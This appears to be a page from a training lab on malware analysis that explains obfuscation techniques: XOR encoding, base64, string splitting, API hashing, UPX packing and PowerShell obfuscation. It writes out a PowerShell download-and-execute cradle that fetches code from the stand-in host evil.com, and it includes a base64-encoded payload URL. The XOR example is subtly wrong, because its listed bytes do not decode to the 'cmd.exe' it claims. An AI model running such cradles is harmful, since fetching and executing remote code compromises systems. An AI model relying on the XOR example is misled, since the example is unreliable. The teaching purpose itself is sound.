>_ Malware Analysis Lab

PRACIVO LAB — SAFE SAMPLES ONLY
[home] [samples] [strings-analysis] [pe-header] [yara-rules] [obfuscation] [sandbox]
⚠️ Pracivo Security Lab — All samples are COMPLETELY SAFE text files. No real malware. For learning static analysis techniques only.

> Obfuscation Techniques

# Malware uses obfuscation to hide from antivirus and analysts

# TECHNIQUE 1: XOR Encoding
# Original string: "cmd.exe"
# XOR with key 0x5A: 976;;?
# Python to decode:
key = 0x5A
encoded = [0x39, 0x37, 0x36, 0x14, 0x3b, 0x3b, 0x3f]
decoded = "".join(chr(b ^ key) for b in encoded)
print(decoded)  # cmd.exe

# TECHNIQUE 2: Base64
import base64
encoded = "aHR0cDovL2V2aWwuY29tL3BheWxvYWQ="
print(base64.b64decode(encoded).decode())  # http://evil.com/payload

# TECHNIQUE 3: String splitting (evades simple signature)
# Instead of: "powershell"
# Malware uses: "power" + "shell"

# TECHNIQUE 4: API hashing
# Instead of importing "CreateRemoteThread" by name,
# malware computes a hash at runtime and finds the function
# This hides the import from static analysis

# TECHNIQUE 5: Packed executables (UPX)
# Compress + encrypt the whole binary
# Decompress to memory at runtime
# Detect: high entropy, small import table, UPX signature

# Detect UPX packing:
strings malware.exe | grep -i upx
# Unpack:
upx -d malware.exe

# TECHNIQUE 6: PowerShell obfuscation
# Obfuscated: &('I'+'EX') (N`EW`-OBJ`ECT Net.WebClient).DownloadString('http://evil.com')
# Deobfuscated: IEX (New-Object Net.WebClient).DownloadString('http://evil.com')